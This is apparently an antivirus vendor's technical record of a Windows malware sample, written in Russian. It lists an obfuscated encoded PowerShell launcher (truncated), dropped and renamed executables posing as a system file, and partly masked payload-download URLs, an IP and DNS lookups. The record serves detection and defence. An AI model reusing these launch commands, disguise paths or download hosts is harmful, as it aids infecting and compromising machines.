Техническая информация
- 'sysmain' "<SYSTEM32>\vcomp120\sysmain.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\d3v93m.exe
- %TEMP%\word\2019\d3v93m.exe
- %TEMP%\word\2019\d3v93m.exe в <SYSTEM32>\vcomp120\sysmain.exe
- %TEMP%\word\2019\d3v93m.exe
- '17#.#1.218.65':80
- http://ch###onghui.cn/wp-content/Z/
- http://bl####asports.com/iv/
- http://17#.#1.218.65/jxXj/vCtzBZ14k1Vru4RL/RGDY/
- DNS ASK th#####tumsphere.com
- DNS ASK tm####nsulting.com
- DNS ASK is##ap.com
- DNS ASK ch###onghui.cn
- DNS ASK ve#####ariapetlife.cl
- DNS ASK bl####asports.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...' (со скрытым окном)